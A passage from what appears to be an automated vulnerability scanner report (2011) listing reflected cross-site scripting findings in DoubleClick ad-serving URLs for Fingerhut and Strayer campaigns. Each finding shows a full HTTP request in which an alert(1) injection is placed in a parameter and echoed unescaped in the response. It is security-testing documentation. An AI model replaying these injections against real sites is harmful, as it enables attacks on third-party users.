<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=2186867337287'-alert(1)-'39e905a1df2&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mass-_-
...[SNIP]...

1.91. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9899c'-alert(1)-'b732d4a27f7 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=116839899c'-alert(1)-'b732d4a27f7&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:11:54 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=116839899c'-alert(1)-'b732d4a27f7&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250
...[SNIP]...

1.92. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 518ed'-alert(1)-'4b93262946f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=518ed'-alert(1)-'4b93262946f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5736
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:13:31 GMT
Expires: Tue, 28 Jun 2011 03:13:31 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=518ed'-alert(1)-'4b93262946fhttp://www.fingerhut.com/user/pre_screen_credit.jsp?CTid=471&CTKey=PS1Reach&CTMedia=x1&CTProgType=mass&CTUnitSize=300x250&CTTestGrp=flash&cm_mmc=x1-_-mass-_-300x250-_-flash';
var target = '_blank';
var
...[SNIP]...

1.93. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/poem/swimlanes [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/poem/swimlanes

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e8c0'-alert(1)-'1349c693deb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/poem/swimlanes;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc9638518e8c0'-alert(1)-'1349c693deb&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=;u=xp_34|21868673;ord=6086992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0I9f5XRr0CFLztmJnQFoaanPJHR0jMRybIHu9W_GDsDFtXMID7LFmLSXlZxVqb3E4tmqeMkJ-_t0-804bCN0jRhVSIYbWS-Neq6DXKXnpTRhHwlHwK4JJ-D7TjgDnwf-mGSPqXMAAAA%3D%26dst%3Dhttp%253A%252F%252Ffingerhut.com&_wp=AAABMNQ5F1dq3aPnx6MOnPuk7OqDrBxrTfmeiQ&_nv=1&_CDbg=21868230&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAMauTQEAAAAAU61NAQAAAADBPQAAAAAAAIGwTQEAAAAAt65NAQAAAAC4rk0BAAAAACND7EEAAAAAAADoPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA4NGQwYjMwZS03MjcwLTRkNWEtODA0NC05ZjM3YmM5NjM4NTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAOlFCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5978
Date: Tue, 28 Jun 2011 03:10:14 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
t = '';
var dcgif = 'http://s0.2mdn.net/1887566/300x250_ps1.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc9638518e8c0'-alert(1)-'1349c693deb&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26
...[SNIP]...

1.94. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4efc"-alert(1)-"09524b1daae was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939d4efc"-alert(1)-"09524b1daae&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:13:10 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939d4efc"-alert(1)-"09524b1daae&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

1.95. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bef7"-alert(1)-"e411786e44c was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=184421635bef7"-alert(1)-"e411786e44c&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=184421635bef7"-alert(1)-"e411786e44c&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "
...[SNIP]...

1.96. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebf06"-alert(1)-"f9932b774ce was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228ebf06"-alert(1)-"f9932b774ce&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:13:54 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
07-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228ebf06"-alert(1)-"f9932b774ce&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscri
...[SNIP]...

1.97. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee414"-alert(1)-"0759993d50b was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956ee414"-alert(1)-"0759993d50b&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
